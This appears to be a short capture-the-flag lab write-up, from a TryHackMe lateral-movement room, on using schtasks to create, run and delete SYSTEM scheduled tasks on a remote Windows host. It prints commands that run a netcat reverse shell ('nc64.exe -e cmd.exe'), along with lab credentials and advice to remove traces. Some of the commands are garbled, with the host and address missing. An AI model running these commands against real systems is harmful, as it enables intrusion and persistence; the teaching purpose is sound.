Spawn remote process with scheduled tasks

Spawn remote process with scheduled tasks


2 min read

Common windows feature abused by threat actors to move laterally and keep persistence is scheduled tasks. Threat actors love this as it's available on any windows installation.


image.png Thanks mura

This blog post will demonstrate this method using the Lateral Movement and Pivoting room provided by TryHackMe Task 4.

How to create a scheduled task on a remote host

schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<payload>" /sc ONCE /sd 01/01/1970 /st 00:00

Command break down:

/s = specify the host we wish remotely issue the command too

/RU = Run task with specified user privilege (Defaults to current user account)

/create = creating the task

/tn = task name "mytask"

/tr = Task run (command to execute)

/sc = Frequency of task Minute, hourly, Daily.. etc

/sd = Start date, the date to execute the task

/st = start time, time of execution

/u = domain username

/p = password, if left blank will be prompted

As we can execute scheduled tasks manually the /sd and /st parameters are not so important in this scenario.

Manual task execution

schtasks /s TARGET /run /TN "THMtask1"

like a good threat actor we want to make sure to clean up after ourselves by deleting the task:

schtasks /S TARGET /TN "THMtask1" /DELETE /F


Let's start by creating our payload using msfvenom


After creating our payload we need some way to get it onto the host, In this scenario I have a set of credentials where I can access a smbshare to upload my reverse shell too


Now that the reverse shell has successfully uploaded I need to now create my task, as we are creating a task on a privileged user I will need to specify the credentials (please ignore the formatting tryhackme attack box sucks)


schtasks /s /RU "SYSTEM" /create /tn "THMtask69" /tr "<c:\tools\nc64.exe -e cmd.exe 4443>" /sc ONCE /sd 01/01/1925 /st 00:00 /u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever

schtasks /s /run /TN "THMtask69" /u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever